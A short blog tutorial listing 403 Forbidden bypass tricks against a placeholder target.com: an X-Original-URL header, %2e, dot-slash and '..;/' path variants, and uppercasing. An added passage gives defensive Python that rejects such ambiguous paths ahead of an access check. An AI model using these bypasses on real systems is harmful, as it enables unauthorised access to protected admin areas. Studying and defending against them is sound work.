---
title: How I passed 403
author: Elsfa7-110
categories: [403, Tutorial]
tags: [403]
pin: true
---

403 Forbidden Bypass

  1. Using “X-Original-URL” header
    
    GET /admin HTTP/1.1
    Host: target.com
    

    Try this to bypass

    
    GET /anything HTTP/1.1
    Host: target.com
    X-Original-URL: /admin
    
  2. Appending %2e after the first slash
    
    http://target.com/admin => 403
    

    Try this to bypass

    
    http://target.com/%2e/admin => 200
    
  3. Try adding a dot (.) and a slash (/) to the URL
    
    http://target.com/admin => 403
    

    Try this to bypass

    
    http://target.com/admin/. => 200
    http://target.com//admin// => 200
    http://target.com/./admin/./ => 200
    
  4. Add “..;/” after the directory name
    
    http://target.com/admin
    

    Try this to bypass

    
    http://target.com/admin..;/
    
  5. Try uppercasing letters in the URL
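
An added example, not part of the original post: a check a defender could place ahead of a path-based ACL so that the ambiguous path forms listed above are refused outright instead of being compared as raw strings. `PROTECTED`, `ambiguity_reasons` and `decide` are hypothetical names, and the back end is assumed to route case-insensitively.

```python
import re
from urllib.parse import unquote
# Assumed for this example: one protected prefix and a back end whose
# routing is case-insensitive. PROTECTED and decide() are illustrative names.
PROTECTED = ("/admin",)

def ambiguity_reasons(raw_path, headers=None):
    """Why this request path cannot be trusted for a string-match ACL."""
    reasons = []
    # The ACL sees the request line; the back end may route on this header.
    if any(name.lower() == "x-original-url" for name in (headers or {})):
        reasons.append("X-Original-URL header")
    if re.search(r"%2e", raw_path, re.IGNORECASE):
        reasons.append("percent-encoded dot")
    decoded = unquote(raw_path)
    if ";" in decoded:
        reasons.append("path parameter ';'")
    if "//" in decoded:
        reasons.append("empty segment '//'")
    if any(seg in (".", "..") for seg in decoded.split("/")):
        reasons.append("dot segment")
    return reasons

def decide(raw_path, headers=None):
    """Return 'reject' (400), 'deny' (403) or 'allow' for one request."""
    if ambiguity_reasons(raw_path, headers):
        return "reject"
    path = raw_path.lower()  # compare the way the back end routes
    for prefix in PROTECTED:
        if path == prefix or path.startswith(prefix + "/"):
            return "deny"
    return "allow"

# Constructed sample requests: the path variants listed in this post.
SAMPLES = [
    ("/admin", {}),
    ("/anything", {"X-Original-URL": "/admin"}),
    ("/%2e/admin", {}),
    ("/admin/.", {}),
    ("//admin//", {}),
    ("/./admin/./", {}),
    ("/admin..;/", {}),
    ("/ADMIN", {}),
    ("/anything", {}),
]

if __name__ == "__main__":
    for path, hdrs in SAMPLES:
        print(f"{path:14} {decide(path, hdrs):7} {ambiguity_reasons(path, hdrs)}")
```

Rejecting these forms at the edge means the ACL and the back end only ever see paths they both read the same way.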
This post is licensed under CC BY 4.0 by the author.